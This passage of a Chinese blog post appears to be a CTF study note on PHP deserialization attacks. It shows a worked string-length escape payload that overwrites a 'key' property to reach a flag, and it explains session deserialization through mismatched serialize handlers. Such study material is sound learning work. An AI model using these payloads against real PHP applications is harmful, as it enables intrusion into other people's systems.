class="string">后面数值为字符型,长度为3,但替换后变成what,明显长度为4,前后矛盾,这个时候就会解析失败</span></span><br><span class="line"><span class="string">但如果将test类的test属性的值改变一下呢?如</span></span><br><span class="line"><span class="string">O:4:&quot;</span><span class="built_in">test</span><span class="string">&quot;:1:&#123;s:4:&quot;</span><span class="built_in">test</span><span class="string">&quot;;s:12:&quot;</span>wotwotwot<span class="string">&quot;;&#125;&quot;</span>;&#125;</span><br><span class="line">这时的<span class="built_in">test</span>属性的值为一个长度为12的字符串wotwotwot<span class="string">&quot;;&#125;</span></span><br><span class="line"><span class="string">接着进行了替换变成了</span></span><br><span class="line"><span class="string">O:4:&quot;</span><span class="built_in">test</span><span class="string">&quot;:1:&#123;s:4:&quot;</span><span class="built_in">test</span><span class="string">&quot;;s:12:&quot;</span>whatwhatwhat<span class="string">&quot;;&#125;&quot;</span>;&#125;</span><br><span class="line">可以发现,替换后wotwotwot变成了whatwhatwhat,仔细数一数会发现</span><br><span class="line">whatwhatwhat的长度就已经为12,</span><br><span class="line">这时再按照反序列化规则来解析,<span class="built_in">test</span>类的<span class="built_in">test</span>变量的值就为whatwhatwhat,</span><br><span class="line">原本的wotwotwot<span class="string">&quot;;&#125;由于wot=&gt;what这种格式的替换</span></span><br><span class="line"><span class="string">整体长度整整多了3,这就导致了反序列化解析式时获取的test属性的值少了最后&quot;</span>;&#125;这三个字符</span><br><span class="line">而这三个符号<span class="string">&quot;;&#125;刚好又是特殊符号与前面的部分形成了闭合保证了能够被正常解析,</span></span><br><span class="line"><span class="string">此时我们可以把这个替换后的结构分开来看一看</span></span><br><span class="line"><span class="string">O:4:&quot;</span><span class="built_in">test</span><span class="string">&quot;:1:&#123;s:4:&quot;</span><span class="built_in">test</span><span class="string">&quot;;s:12:&quot;</span>whatwhatwhat<span class="string">&quot;;&#125;			&quot;</span>;&#125;</span><br><span class="line">很显然,前面部分就按照解析规则已经可以被正常的解析为一个类了,PHP解析到此也就停止</span><br><span class="line">后面部分的<span class="string">&quot;;&#125;省去</span></span><br><span class="line"><span class="string">回到本题上来,也是同样的方法</span></span><br><span class="line"><span class="string">我们先列出来,如果extract类中的key属性值为所需值时序列化结果(假设传入令var值为a)</span></span><br><span class="line"><span class="string">O:7:&quot;</span>extract<span class="string">&quot;:2:&#123;s:3:&quot;</span>var<span class="string">&quot;;s:1:&quot;</span>a<span class="string">&quot;;s:3:&quot;</span>key<span class="string">&quot;;s:16:&quot;</span>this_is_a_secret<span class="string">&quot;;&#125;</span></span><br><span class="line"><span class="string">但实际题目中我们获得的序列化结果是</span></span><br><span class="line"><span class="string">O:7:&quot;</span>extract<span class="string">&quot;:2:&#123;s:3:&quot;</span>var<span class="string">&quot;;s:1:&quot;</span>a<span class="string">&quot;;s:3:&quot;</span>key<span class="string">&quot;;s:20:&quot;</span>this_is_not_a_secret<span class="string">&quot;;&#125;</span></span><br><span class="line"><span class="string">按照上述同理,我们可以让var属性的值以&quot;</span>;s:3:<span class="string">&quot;key&quot;</span>;s:16:<span class="string">&quot;this_is_a_secret&quot;</span>;&#125;这部分结尾(这部分37个字符)</span><br><span class="line">以一定数量的(37个)wot开头,这样由于随后的wot=&gt;what替换</span><br><span class="line">结尾的部分便被<span class="string">&quot;挤出去&quot;</span>了,随后按照反序列化规则的解析,</span><br><span class="line">反序列化结果中key属性值便是this_is_a_secret也就拿到flag了</span><br><span class="line">[flag]</span><br><span class="line">flag&#123;ez_Var1abl2_c0verAg2&#125;</span><br></pre></td></tr></table></figure>



<h4 id="session反序列化攻击："><a href="#session反序列化攻击：" class="headerlink" title="session反序列化攻击："></a>session反序列化攻击：</h4><h5 id="先来了解一下什么是session"><a href="#先来了解一下什么是session" class="headerlink" title="先来了解一下什么是session:"></a>先来了解一下什么是session:</h5><p>在计算机中，尤其是在网络应用中，称为“会话控制”。<strong>Session 对象存储特定用户会话所需的属性及配置信息。</strong>这样，<strong>当用户在应用程序的 Web 页之间跳转时，存储在 Session 对象中的变量将不会丢失，而是在整个用户会话中一直存在下去。</strong>当用户请求来自应用程序的 Web 页时，如果该用户还没有会话，则 Web 服务器将自动创建一个 Session 对象。当会话过期或被放弃后，服务器将终止该会话。</p>
<h5 id="session是如何起作用的："><a href="#session是如何起作用的：" class="headerlink" title="session是如何起作用的："></a>session是如何起作用的：</h5><p>当第一次访问网站时，Seesion_start()函数就会创建一个唯一的Session ID，并自动通过HTTP的响应头，将这个Session ID保存到客户端Cookie中。同时，也在服务器端创建一个以Session ID命名的文件，用于保存这个用户的会话信息。当同一个用户再次访问这个网站时，也会自动通过HTTP的请求头将Cookie中保存的Seesion ID再携带过来，这时Session_start()函数就不会再去分配一个新的Session ID，而是在服务器的硬盘中去寻找和这个Session ID同名的Session文件，将这之前为这个用户保存的会话信息读出，在当前脚本中应用，达到跟踪这个用户的目的。</p>
<h5 id="session-start函数的作用："><a href="#session-start函数的作用：" class="headerlink" title="session_start函数的作用："></a>session_start函数的作用：</h5><p>当会话自动开始或者通过 session_start() 手动开始的时候， PHP 内部会依据客户端传来的PHPSESSID来获取现有的对应的会话数据（即session文件）， <strong>PHP 会自动反序列化session文件的内容</strong>，<strong>并将之填充到 $_SESSION 超级全局变量中</strong>。如果不存在对应的会话数据，则创建名为sess_PHPSESSID(客户端传来的)的文件。<strong>如果客户端未发送PHPSESSID，则创建一个由32个字母组成的PHPSESSID，并返回set-cookie。</strong></p>
<h5 id="想要知道为什么为出现这个session漏洞，就需要了解session机制中对序列化是如何处理的："><a href="#想要知道为什么为出现这个session漏洞，就需要了解session机制中对序列化是如何处理的：" class="headerlink" title="想要知道为什么为出现这个session漏洞，就需要了解session机制中对序列化是如何处理的："></a>想要知道为什么为出现这个session漏洞，就需要了解session机制中对序列化是如何处理的：</h5><p><img src="/2021/11/17/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/Users\SMY\AppData\Roaming\Typora\typora-user-images\image-20211015214433147.png" alt="image-20211015214433147"></p>
<p>这个便是在相应的处理器处理下，<code>session</code>所存储的格式，这里举个例子来了解一下在不同的处理器下，session所储存的格式有什么不一样：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">ini_set(<span class="string">&#x27;session.serialize_handler&#x27;</span>, <span class="string">&#x27;php&#x27;</span>);</span><br><span class="line"><span class="comment">//ini_set(&quot;session.serialize_handler&quot;, &quot;php_serialize&quot;);</span></span><br><span class="line"><span class="comment">//ini_set(&quot;session.serialize_handler&quot;, &quot;php_binary&quot;);</span></span><br><span class="line">session_start();</span><br><span class="line"><span class="variable">$_SESSION</span>[<span class="string">&#x27;lemon&#x27;</span>] = <span class="variable">$_GET</span>[<span class="string">&#x27;a&#x27;</span>];</span><br><span class="line"><span class="keyword">echo</span> <span class="string">&quot;&lt;pre&gt;&quot;</span>;</span><br><span class="line">var_dump(<span class="variable">$_SESSION</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">&quot;&lt;/pre&gt;&quot;</span>;</span><br><span class="line"></span><br><span class="line"><span class="comment">//输出为：</span></span><br><span class="line">php : lemon|s:<span class="number">3</span>:<span class="string">&quot;shy&quot;</span>;</span><br><span class="line">php_serialize : a:<span class="number">1</span>:&#123;s:<span class="number">5</span>:<span class="string">&quot;lemon&quot;</span>;s:<span class="number">3</span>:<span class="string">&quot;shy&quot;</span>;&#125;</span><br><span class="line">php_binary : lemons:<span class="number">3</span>:<span class="string">&quot;shy&quot;</span>;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p><strong>其实PHP中的Session的实现是没有的问题，危害主要是由于程序员的Session使用不当而引起的。如：使用不同引擎来处理session文件。</strong></p>
<h5 id="使用不同的引擎来处理session文件-session反序列化漏洞）"><a href="#使用不同的引擎来处理session文件-session反序列化漏洞）" class="headerlink" title="使用不同的引擎来处理session文件(session反序列化漏洞）:"></a>使用不同的引擎来处理session文件(session反序列化漏洞）:</h5><p>php引擎的存储格式是<code>键名 | serialized_string</code>，而php_serialize引擎的存储格式是<code>serialized_string</code>。<strong>如果程序使用两个引擎来分别处理的话就会出现问题。</strong></p>
<p><strong>(1.php)</strong></p>
<p>先以<code>php_serialize</code>的格式存储，从客户端接收参数并存入<code>session</code>变量</p>
<p><img src="/2021/11/17/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/Users\SMY\AppData\Roaming\Typora\typora-user-images\image-20211015214940789.png" alt="image-20211015214940789"></p>
<p><strong>(2.php)</strong></p>
<p>接下来使用<code>php</code>引擎读取session文件</p>
<p><img src="/2021/11/17/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/Users\SMY\AppData\Roaming\Typora\typora-user-images\image-20211015215007817.png" alt="image-20211015215007817"></p>
<h4 id="攻击思路："><a href="#攻击思路：" class="headerlink" title="攻击思路："></a>攻击思路：</h4><p>首先访问1.php，<strong>在传入的参数最开始加一个’|’<strong>，由于</strong>1.php是使用php_serialize引擎处理，因此只会把’|’当做一个正常的字符。</strong>然后访问2.php，由于用的是<strong>php引擎，因此遇到’|’时会将之看做键名与值的分割符，从而造成了歧义，导致其在解析session文件时直接对’|’后的值进行反序列化处理。</strong></p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/%E5%8F%91%E5%BA%8F%E5%88%97%E5%8C%96/" rel="tag"># 发序列化</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2021/11/17/hello/" rel="prev" title="Hello">
      <i class="fa fa-chevron-left"></i> Hello
    </a></div>
      <div class="post-nav-item">
    <a href="/2021/11/18/CNSS-2021-Recruit-web%E5%A4%8D%E7%8E%B0/" rel="next" title="CNSS-2021-Recruit web复现">
      CNSS-2021-Recruit web复现 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          
    <div class="comments" id="valine-comments"></div>

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%BA%8F%E5%88%97%E5%8C%96%E4%B8%8E%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96"><span class="nav-number">1.</span> <span class="nav-text">序列化与反序列化</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%BA%8F%E5%88%97%E5%8C%96%E5%87%BD%E6%95%B0%EF%BC%9Aserialize%EF%BC%9A"><span class="nav-number">1.0.1.</span> <span class="nav-text">序列化函数：serialize：</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%87%BD%E6%95%B0%EF%BC%9Aunserialize"><span class="nav-number">1.0.2.</span> <span class="nav-text">反序列化函数：unserialize:</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#PHP%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%EF%BC%9A"><span class="nav-number">1.0.3.</span> <span class="nav-text">PHP反序列化漏洞：</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E7%BB%95%E8%BF%87%E9%AD%94%E6%B3%95%E5%87%BD%E6%95%B0%E7%9A%84%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%EF%BC%9A"><span class="nav-number">1.0.4.</span> <span class="nav-text">绕过魔法函数的反序列化：</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#1-wakeup-%E9%AD%94%E6%B3%95%E5%87%BD%E6%95%B0%E7%BB%95%E8%BF%87%EF%BC%9APHP%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9ECVE-2016-7124%E2%80%94%E2%80%94%E5%BD%93%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E4%B8%AD%EF%BC%8C%E8%A1%A8%E7%A4%BA%E5%B1%9E%E6%80%A7%E4%B8%AA%E6%95%B0%E7%9A%84%E5%80%BC%E5%A4%A7%E4%BA%8E%E7%9C%9F%E5%AE%9E%E5%B1%9E%E6%80%A7%E4%B8%AA%E6%95%B0%E6%97%B6%EF%BC%8C%E4%BC%9A%E7%BB%95%E8%BF%87-wakeup-%E5%87%BD%E6%95%B0%E7%9A%84%E6%89%A7%E8%A1%8C%E3%80%82"><span class="nav-number">1.0.4.1.</span> <span class="nav-text">1.wakeup()魔法函数绕过：PHP反序列化漏洞CVE-2016-7124——当反序列化字符串中，表示属性个数的值大于真实属性个数时，会绕过 __wakeup 函数的执行。</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#2-test%E2%80%94%E2%80%94CVE%E6%BC%8F%E6%B4%9E%EF%BC%9A"><span class="nav-number">1.0.4.2.</span> <span class="nav-text">2.test——CVE漏洞：</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#pop%E9%93%BE%EF%BC%9A"><span class="nav-number">1.0.5.</span> <span class="nav-text">pop链：</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%8F%98%E9%87%8F%E8%A6%86%E7%9B%96%EF%BC%9A"><span class="nav-number">1.0.6.</span> <span class="nav-text">反序列化变量覆盖：</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#session%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%94%BB%E5%87%BB%EF%BC%9A"><span class="nav-number">1.0.7.</span> <span class="nav-text">session反序列化攻击：</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#%E5%85%88%E6%9D%A5%E4%BA%86%E8%A7%A3%E4%B8%80%E4%B8%8B%E4%BB%80%E4%B9%88%E6%98%AFsession"><span class="nav-number">1.0.7.1.</span> <span class="nav-text">先来了解一下什么是session:</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#session%E6%98%AF%E5%A6%82%E4%BD%95%E8%B5%B7%E4%BD%9C%E7%94%A8%E7%9A%84%EF%BC%9A"><span class="nav-number">1.0.7.2.</span> <span class="nav-text">session是如何起作用的：</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#session-start%E5%87%BD%E6%95%B0%E7%9A%84%E4%BD%9C%E7%94%A8%EF%BC%9A"><span class="nav-number">1.0.7.3.</span> <span class="nav-text">session_start函数的作用：</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E6%83%B3%E8%A6%81%E7%9F%A5%E9%81%93%E4%B8%BA%E4%BB%80%E4%B9%88%E4%B8%BA%E5%87%BA%E7%8E%B0%E8%BF%99%E4%B8%AAsession%E6%BC%8F%E6%B4%9E%EF%BC%8C%E5%B0%B1%E9%9C%80%E8%A6%81%E4%BA%86%E8%A7%A3session%E6%9C%BA%E5%88%B6%E4%B8%AD%E5%AF%B9%E5%BA%8F%E5%88%97%E5%8C%96%E6%98%AF%E5%A6%82%E4%BD%95%E5%A4%84%E7%90%86%E7%9A%84%EF%BC%9A"><span class="nav-number">1.0.7.4.</span> <span class="nav-text">想要知道为什么为出现这个session漏洞，就需要了解session机制中对序列化是如何处理的：</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E4%BD%BF%E7%94%A8%E4%B8%8D%E5%90%8C%E7%9A%84%E5%BC%95%E6%93%8E%E6%9D%A5%E5%A4%84%E7%90%86session%E6%96%87%E4%BB%B6-session%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%EF%BC%89"><span class="nav-number">1.0.7.5.</span> <span class="nav-text">使用不同的引擎来处理session文件(session反序列化漏洞）:</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%94%BB%E5%87%BB%E6%80%9D%E8%B7%AF%EF%BC%9A"><span class="nav-number">1.0.8.</span> <span class="nav-text">攻击思路：</span></a></li></ol></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">huhu</p>
  <div class="site-description" itemprop="description">never give up</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">5</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">3</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">5</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>

  


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">huhu</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-area"></i>
    </span>
    <span title="站点总字数">25k</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
    <span title="站点阅读时长">23 分钟</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>


<script>
    // 点击回复直接评论,官方版本点击回复时都是跳回到页面上方的评论框进行回复，评论框是固定不动的
    // 参考https://immmmm.com/valine-diy,用到jQuery
    $(document).ready(function(){
        //$('.vemoji-btn').text('😀');
        $("#vcomments").on('click', 'span.vat',function(){
            $(this).parent('div.vmeta').next("div.vcontent").after($("div.vwrap"));
            $('textarea#veditor').focus();
        })
    })
</script>

        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  


<script>
NexT.utils.loadComments(document.querySelector('#valine-comments'), () => {
  NexT.utils.getScript('//unpkg.com/valine/dist/Valine.min.js', () => {
    var GUEST = ['nick', 'mail', 'link'];
    var guest = 'nick,mail,link';
    guest = guest.split(',').filter(item => {
      return GUEST.includes(item);
    });
    new Valine({
      el         : '#valine-comments',
      verify     : false,
      notify     : false,
      appId      : 'rLmjgPDqyvfFEImeJKvRDmYa-gzGzoHsz',
      appKey     : 'vLNMsnx2N9ODDVD9Ut5sYuq9',
      placeholder: "Just go go ^_^",
      avatar     : 'mm',
      meta       : guest,
      pageSize   : '10' || 10,
      visitor    : true,
      lang       : '' || 'zh-cn',
      path       : location.pathname,
      recordIP   : false,
      serverURLs : ''
    });
  }, window.Valine);
});
</script>

  
  
	<script type="text/javascript"
	color="0,0,0" opacity='0.7' zIndex="-2" count="250" src="//cdn.bootcss.com/canvas-nest.js/1.0.0/canvas-nest.min.js"></script>
  
  
<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script></body>
</html>
<!-- 页面点击小红心 -->
<script type="text/javascript" src="/js/schemes/clicklove.js"></script>
